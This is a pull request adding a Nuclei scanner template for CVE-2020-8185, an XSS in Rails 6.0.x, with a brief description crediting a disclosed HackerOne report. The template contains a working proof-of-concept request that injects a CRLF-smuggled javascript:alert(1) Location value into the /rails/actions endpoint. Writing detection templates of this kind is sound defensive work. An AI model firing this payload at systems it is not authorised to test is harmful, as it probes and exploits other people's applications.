### PR TITLE
Add Rails 6 XSS CVE-2020-8185

### DIFF
--- a/cves/CVE-2020-8185.yaml
+++ b/cves/CVE-2020-8185.yaml
@@ -1,19 +1,22 @@
 id: CVE-2020-8185
 info:
   name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2)
-  author: ooooooo_q (CVE author), Rahul and Harsh (Template author) 
+  author: 'ooooooo_q (CVE author), Rahul and Harsh (Template author)'
   severity: Medium
-  description: XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); Nuclei has issues with 302 response missing a Location header thus the extended payload to make Nuclei work.
-
+  description: >-
+    XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1);
+    Nuclei has issues with 302 response missing a Location header thus the
+    extended payload to make Nuclei work.
 requests:
   - method: POST
     path:
-      - "{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa"
+      - >-
+        {{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "javascript:alert(1)"
+          - 'javascript:alert(1)'
         part: body
       - type: status
         status:

--- a/cves/CVE-2020-8185.yaml
+++ b/cves/CVE-2020-8185.yaml
@@ -1,0 +1,20 @@
+id: CVE-2020-8185
+info:
+  name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2)
+  author: ooooooo_q (CVE author), Rahul and Harsh (Template author) 
+  severity: Medium
+  description: XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); Nuclei has issues with 302 response missing a Location header thus the extended payload to make Nuclei work.
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "javascript:alert(1)"
+        part: body
+      - type: status
+        status:
+          - 302


### PR DESCRIPTION
H1 Report for the disclosed Ruby on Rails 6 XSS - https://hackerone.com/reports/904059 by https://twitter.com/ooooooo_q 

While creating this @iamnoooob and I noticed that Nuclei don't seem to handle 302 Response without Location header. Maybe we should open an issue for that?